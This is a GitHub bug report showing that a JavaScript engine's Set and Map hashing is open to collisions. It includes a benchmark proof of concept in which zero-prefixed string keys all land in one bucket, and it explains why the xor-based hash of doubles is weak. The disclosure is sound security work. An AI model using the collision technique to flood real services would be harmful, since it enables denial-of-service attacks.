Skip to content

Set and Map are vulnerable to hash collisions #205

Open
@bnoordhuis

Description

@bnoordhuis
import * as os from "os"
function go(a) {
    const s = new Set()
    const t0 = os.now()
    for (let i = a.length; i-- > 0; s.add(a[i]));
    const t1 = os.now()
    return t1-t0
}
function fmt(x) {
    return ("       " + x).slice(-7)
}
function bench(c) {
    const p = ("0000" + c.charCodeAt(0).toString(16)).slice(-4)
    const k = c.repeat(0x1000) + "k"
    const a = []
    for (let i = k.length; i-- > 0;) a.push(k.slice(i))
    let b = []
    for (let i = 0; i < 20; i++) b.push(go(a))
    b.sort((x, y) => x-y)
    b = b.map(fmt)
    print(p, b[0], b[9], b[19]); // min, median, max
}
for (let i = 0; i < 128; i++) bench(String.fromCharCode(i))

Prints:

0000  869180  886624  905783  # 8x slower on 64k inserts!
0001   95426  102488  157594
0002  100252  106452  172442
0003   96300  102617  128371
0004  112713  114385  229245
0005   95087  102894  108105
0006  105638  107379  161700
0007  102093  105335  168217
...

I exploit a weakness of map_hash_key() by inserting keys with ever longer zero prefixes - "k", "\0k", "\0\0k", etc. - that all hash to the same value and end up in the same hash bucket.

Doubles-as-keys are exploitable too; maybe ints too because they're cast to doubles before hashing. The hash algorithm is this:

u.d = d;
h = (u.u32[0] ^ u.u32[1]) * 3163;

But there are literally millions of normal and subnormal doubles with high and low words that are bitwise identical and cancel each other out when xor'ed.

Metadata

Metadata

Assignees

No one assigned

    Labels

    bugSomething isn't working

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions